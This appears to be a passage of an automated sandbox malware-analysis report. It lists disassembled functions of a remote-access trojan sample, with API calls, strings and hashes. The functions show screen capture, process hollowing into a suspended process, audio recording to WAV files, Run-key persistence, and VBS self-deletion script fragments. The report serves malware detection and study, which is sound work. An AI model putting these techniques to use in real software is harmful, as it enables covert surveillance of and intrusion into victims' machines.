                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                              • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                              • String ID: JD
                                                              • API String ID: 1084509184-2669065882
                                                              • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                              • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                              • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                              • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                              Function 0044896D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID: GetLocaleInfoEx
                                                              • API String ID: 2299586839-2904428671
                                                              • Opcode ID: 110c46932bfbdc71483985bf7c59ae7b5a80d23a28ef7d8b7feaf75df53ed1b9
                                                              • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                              • Opcode Fuzzy Hash: 110c46932bfbdc71483985bf7c59ae7b5a80d23a28ef7d8b7feaf75df53ed1b9
                                                              • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                              Function 00452393 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                              • String ID:
                                                              • API String ID: 1663032902-0
                                                              • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                              • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                              • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                              • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                              Function 004525C3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$InfoLocale_abort_free
                                                              • String ID:
                                                              • API String ID: 2692324296-0
                                                              • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                              • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                              • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                              • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                              Function 0041B69E Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: NameUser
                                                              • String ID:
                                                              • API String ID: 2645101109-0
                                                              • Opcode ID: 6f8df8ca086827d3b7a07e2ceec29cc063485458526563a8914dedb1098b546b
                                                              • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                              • Opcode Fuzzy Hash: 6f8df8ca086827d3b7a07e2ceec29cc063485458526563a8914dedb1098b546b
                                                              • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                              Function 00448484 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(?,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                              • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                              • String ID:
                                                              • API String ID: 1272433827-0
                                                              • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                              • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                              • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                              • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                              Function 00451FD0 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                              • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                              • String ID:
                                                              • API String ID: 1084509184-0
                                                              • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                              • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                              • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                              • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                              Function 0040F90C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.3 Pro), ref: 0040F920
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID:
                                                              • API String ID: 2299586839-0
                                                              • Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                                              • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                              • Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                                              • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                              Function 00418EB1 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                              • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                              • DeleteDC.GDI32(00000000), ref: 00418F65
                                                              • DeleteDC.GDI32(00000000), ref: 00418F68
                                                              • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                              • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                              • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                              • GetIconInfo.USER32(?,?), ref: 00418FF8
                                                              • DeleteObject.GDI32(?), ref: 00419027
                                                              • DeleteObject.GDI32(?), ref: 00419034
                                                              • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                              • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                              • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                              • DeleteDC.GDI32(?), ref: 004191B7
                                                              • DeleteDC.GDI32(00000000), ref: 004191BA
                                                              • DeleteObject.GDI32(00000000), ref: 004191BD
                                                              • GlobalFree.KERNEL32(?), ref: 004191C8
                                                              • DeleteObject.GDI32(00000000), ref: 0041927C
                                                              • GlobalFree.KERNEL32(?), ref: 00419283
                                                              • DeleteDC.GDI32(?), ref: 00419293
                                                              • DeleteDC.GDI32(00000000), ref: 0041929E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                              • String ID: DISPLAY
                                                              • API String ID: 479521175-865373369
                                                              • Opcode ID: a3a4741cb06b3bb280ebd52fb29a8cd3e9580c118e1ba6673d441af15fd395ed
                                                              • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                              • Opcode Fuzzy Hash: a3a4741cb06b3bb280ebd52fb29a8cd3e9580c118e1ba6673d441af15fd395ed
                                                              • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                              Function 0041812A Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                              • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                              • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                              • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                              • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                              • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                              • ResumeThread.KERNEL32(?), ref: 00418470
                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                              • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                              • GetLastError.KERNEL32 ref: 004184B5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                              • API String ID: 4188446516-3035715614
                                                              • Opcode ID: 270f6f13d6fde63ba60b02dc59acd4711bf4d0802e0e8c14fb5fe4b704ceb149
                                                              • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                              • Opcode Fuzzy Hash: 270f6f13d6fde63ba60b02dc59acd4711bf4d0802e0e8c14fb5fe4b704ceb149
                                                              • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                                              Function 0040D45B Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                                • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                                                • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                                                • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                              • ExitProcess.KERNEL32 ref: 0040D80B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                              • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                              • API String ID: 1861856835-1447701601
                                                              • Opcode ID: 794eba10b69094c6990f25edb43bc5f181c5c90267341265794d1b1851e37820
                                                              • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                              • Opcode Fuzzy Hash: 794eba10b69094c6990f25edb43bc5f181c5c90267341265794d1b1851e37820
                                                              • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                              Function 0040D0D1 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                                • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                                                • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                                                • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                              • ExitProcess.KERNEL32 ref: 0040D454
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                              • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                              • API String ID: 3797177996-2483056239
                                                              • Opcode ID: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
                                                              • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                              • Opcode Fuzzy Hash: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
                                                              • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                              Function 004124B0 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                              • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                              • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                              • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                              • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                              • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                              • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                              • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                              • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                              • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                              • API String ID: 2649220323-436679193
                                                              • Opcode ID: ad55fade47a44d5a96cc11b86df2472168e9c7caf5a37438c9269d8872241baf
                                                              • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                              • Opcode Fuzzy Hash: ad55fade47a44d5a96cc11b86df2472168e9c7caf5a37438c9269d8872241baf
                                                              • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                              Function 0041B0D8 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
                                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                              • SetEvent.KERNEL32 ref: 0041B2AA
                                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                              • CloseHandle.KERNEL32 ref: 0041B2CB
                                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                              • API String ID: 738084811-2094122233
                                                              • Opcode ID: d561e535e20e94d4d32498695f90d41e23c390ecef7d03d0c81b33d87c062984
                                                              • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                              • Opcode Fuzzy Hash: d561e535e20e94d4d32498695f90d41e23c390ecef7d03d0c81b33d87c062984
                                                              • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                              Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                              • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                              • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                              • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Write$Create
                                                              • String ID: RIFF$WAVE$data$fmt
